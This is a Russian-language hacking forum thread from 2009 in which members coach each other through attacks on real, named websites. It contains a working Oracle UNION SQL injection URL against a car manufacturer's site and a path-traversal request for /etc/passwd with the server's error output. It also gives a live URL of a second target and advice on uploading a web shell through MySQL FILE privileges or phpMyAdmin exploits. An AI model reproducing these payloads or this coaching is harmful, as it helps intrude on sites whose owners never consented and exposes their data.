HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.01.2009, 01:56
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
Вот статья по теме:
https://forum.antichat.ru/showthread.php?p=437118
Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit
 
Ответить с цитированием

  #2  
Старый 04.01.2009, 02:04
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

Желаю удачи
 
Ответить с цитированием

  #3  
Старый 04.01.2009, 02:40
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
http://forum.antichat.ru/showthread.php?t=40576
 
Ответить с цитированием

  #4  
Старый 04.01.2009, 04:20
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию

Код:
http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_char(213),null+from+sys.dual--%20&branch=tth
Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?
 
Ответить с цитированием

  #5  
Старый 04.01.2009, 12:28
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию

Цитата:
Сообщение от prescott  
Код:
http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_char(213),null+from+sys.dual--%20&branch=tth
Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?
Еще раз спрошу
 
Ответить с цитированием

  #6  
Старый 04.01.2009, 09:11
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

при запросе index.php4?lang=1' выдает ошибку
Warning: main(lang/inc.lang1'.php): failed to open stream
при таком запросе index.php4?lang=/../../../../../../../../../../../../../etc/passwd%00 ошибка
Warning: main(lang/inc.lang/../../../../../../../../../../../../../etc/passwd
как я понял он не может найти папку inc.lang(( как правильно составить?))
 
Ответить с цитированием

  #7  
Старый 04.01.2009, 10:01
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

j0ker13. Такого файла нет, в НИКСах вылазит ошибка (может не во всех). Если бы была винда. то ты бы смог прочесть файл

Последний раз редактировалось o3,14um; 04.01.2009 в 10:04..
 
Ответить с цитированием

  #8  
Старый 04.01.2009, 10:47
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

to o3,14um а смысле нет файла?)) если ты про ошибку то я сам перевел что он ругается на отсуствие файла) разве это не иньект?
мне кажется что он не может найти папку которую я указал выше) т.к. своим запросом исковеркал ее имя))

Последний раз редактировалось j0ker13; 04.01.2009 в 10:55..
 
Ответить с цитированием

  #9  
Старый 04.01.2009, 11:53
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

Это какбы файл должен быть атким:
lang/inc.lang1.php

НО ты изменил запрос на
lang/inc.lang/
и теперь имя файла воспринимается как папка, которой не существует. Успез зависит от оси и от других папок, расположенный в этой папке=)

Если там сеть папка, с началом названия inc.lang то те повезло
 
Ответить с цитированием

  #10  
Старый 04.01.2009, 12:13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

2Iceangel_ ога)
2o3,14um вот и я про тоже)
кароч вот http://nouveauniveau.com/index.php4?lang=1'
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.